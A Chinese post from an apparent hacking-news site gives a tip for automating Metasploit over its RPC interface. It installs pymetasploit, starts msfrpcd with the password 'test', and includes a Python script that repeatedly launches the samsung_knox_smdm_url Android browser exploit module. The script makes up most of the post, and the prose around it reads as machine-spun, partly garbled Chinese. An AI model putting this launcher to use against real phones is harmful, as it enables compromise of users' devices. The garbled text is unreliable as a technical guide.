Metasploit快速测试脚本的TIPS

Metasploit快速测试脚本的TIPS

黑客软件hacker2016-01-14 15:22:569605A+A-

坚信试过metasploit的同班都很悲催,msfconsole悠长的开机时间,假如检测中敲错指令,或不慎撤出后又重新启动任務,会给你立即抗爹。以前不愿反复敲指令,看过下metasploit的开发文档,发觉要智能化有各类预案,我觉得最便捷的是启用RPC插口,GITHUB上搜了把,发觉有大拿封裝好啦模快,立即启用只能:

安裝pymetasploit模快

git clone https://github.com/allfro/pymetasploit

拷贝编码

切到文件名

sudo python setup.py install

拷贝编码

起动metasploit的RPC业务

        

msfrpcd -P test -n -f -a 127.0.0.1

拷贝编码

这一test是rpc业务的PIN码,登录名初始是msf

订制自身的检测角本

我这儿订制的是检测三星knox木马病毒的角本,构思是每一次起动先把以前运作的job和console停用,随后自動建立1个console自動敲入指令开展新的木马病毒检测,立即crtl-c完毕角本再再次检测全是1个新的job,并且每一次检测全是秒开,无需再重新启动msfconsole了。里面各类插口如何使用,推介大伙儿再翻下管方的word表格。

from metasploit.msfrpc import MsfRpcClient

import time

client = MsfRpcClient('test')

jobs = client.call('job.list')

for num in jobs.keys():

    if jobs[num].find('samsung_knox_smdm_url')>0:

        client.call('job.stop',num)

console = client.call('console.list')

for _console in console['consoles']:

    if _console.has_key('prompt'):

        if _console['prompt'].find('samsung_knox_smdm_url')>0:

            client.call('console.destroy', _console['id'])

cmd='''

use exploit/android/browser/samsung_knox_smdm_url

set LHOST 127.0.0.1

exploit

'''

res = client.call('console.create')

console_id = res['id']

client.call('console.write', console_id, cmd)

try:

    while True:

        res = client.call('console.read',console_id)

        if len(res['data']) > 1:

                print res['data'],

        if res['busy'] == True:

                time.sleep(1)

                continue

except:

    pass


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 嘻友岛徒2022-05-30 19:16:01
  • 'data']) > 1:                print res['data'],        if res[&#
  • 野欢秋酿2022-05-30 20:33:05
  • _console['id'])cmd='''use exploit/android/browser/samsung_knox_smdm_urlset LHOST 127.
  • 拥嬉二奴2022-05-30 19:44:29
  • bsp;   if _console.has_key('prompt'):        if _con
  • 纵遇拥野2022-05-30 20:44:00
  • bs[num].find('samsung_knox_smdm_url')>0:        client.call('job.stop',num)console = client.call('conso
  • 语酌寻倌2022-05-30 22:45:37
  • lient.call('job.stop',num)console = client.call('console.list')for _console in console['consoles']:   

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理